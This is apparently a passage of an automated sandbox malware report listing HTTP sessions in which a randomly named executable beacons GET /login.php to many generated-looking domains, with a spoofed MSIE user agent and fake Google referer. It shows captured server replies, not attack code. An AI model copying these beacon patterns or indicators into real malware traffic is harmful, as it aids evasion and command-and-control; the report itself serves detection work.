                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.871604919 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.178250074 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:09.281229019 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:09 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  53192.168.2.6521193.94.10.34806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.645026922 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lymyxid.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.076699018 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  54192.168.2.652122199.59.243.227801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676589012 CET305OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: vojyqem.com
                                                                                                                                                                                                                  Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122396946 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  date: Mon, 11 Nov 2024 17:51:02 GMT
                                                                                                                                                                                                                  content-type: text/html; charset=utf-8
                                                                                                                                                                                                                  content-length: 1094
                                                                                                                                                                                                                  x-request-id: f0a3a827-a1a8-4766-bafa-4589935061b4
                                                                                                                                                                                                                  cache-control: no-store, max-age=0
                                                                                                                                                                                                                  accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==
                                                                                                                                                                                                                  set-cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723; expires=Mon, 11 Nov 2024 18:06:03 GMT
                                                                                                                                                                                                                  Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 56 4d 79 74 48 62 6d 6d 72 66 4d 63 2b 6b 7a 6d 69 50 59 54 74 32 75 53 32 50 44 6e 48 48 6a 2f 70 2f 32 6e 43 4e 4e 30 34 47 32 65 4f 72 59 58 2f 4c 53 49 39 69 66 61 74 74 43 39 36 6f 39 32 78 43 7a 57 72 75 51 36 35 71 6c 39 2b 6f 6f 6e 64 7a 63 54 44 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VMytHbmmrfMc+kzmiPYTt2uS2PDnHHj/p/2nCNN04G2eOrYX/LSI9ifattC96o92xCzWruQ65ql9+oondzcTDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122451067 CET520INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65
                                                                                                                                                                                                                  Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWU4OTBhNzMtYWMzYi00MmQwLTgwNmYtMzk3MjVmYTRiNzIzIiwicGFnZV90aW1lIjoxNzMxMzQ3NDYzLCJwYWdlX3VybCI6Imh0dHA6L


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  55192.168.2.652123208.100.26.245801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676775932 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.128988981 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.638961077 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lyvyxor.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:10.742697954 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:10 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Content-Length: 580
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  56192.168.2.65212144.221.84.105801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.676995039 CET352OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qetyfuv.com
                                                                                                                                                                                                                  Cookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.122596025 CET335INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  Set-Cookie: btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347463|1731347428|17|2|0; path=/; domain=.qetyfuv.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  57192.168.2.652124162.255.119.102801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687438011 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gahyqah.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.214816093 CET303INHTTP/1.1 302 Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: http://www.gahyqah.com/login.php
                                                                                                                                                                                                                  X-Served-By: Namecheap URL Forward
                                                                                                                                                                                                                  Server: namecheap-nginx
                                                                                                                                                                                                                  Data Raw: 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 68 79 71 61 68 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 27 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                  Data Ascii: <a href='http://www.gahyqah.com/login.php'>Found</a>.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  58192.168.2.652125178.162.203.226806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.687581062 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: gatyfus.com


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  59192.168.2.652126188.114.96.3806912C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.691417933 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.387069941 CET966INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3S6N%2FdXbrZYQHEs6X9pvchDPPcRSfj28bga8Xjo0OpfFATynLUC7cLpPRPuLRTA7xNHCoWOiKF%2BhEmsLhGZxaLdONiM9STO0gMfYDhBRiH93jXagf2Kgwqymu409FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020cc18f24390-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1274&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                                                  Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  60192.168.2.652128188.114.96.3801220C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Nov 11, 2024 18:51:02.787517071 CET243OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: qegyhig.com
                                                                                                                                                                                                                  Nov 11, 2024 18:51:03.512835979 CET970INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:51:03 GMT
                                                                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                  Location: https://qegyhig.com/login.php
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FNLXFZo7gMuEyQOH88caaMUP80aHjmpaw9%2B8jESWaOr8endqcT8id0qmPdlUhUEHIX4zjTTfndFdCDbM6%2F0i%2FdFUtJ3VuNq3M1PezeSSIssrYXsXBGN7UnWGmF7GA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e1020cceeac5122-MSP
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=33449&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=243&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
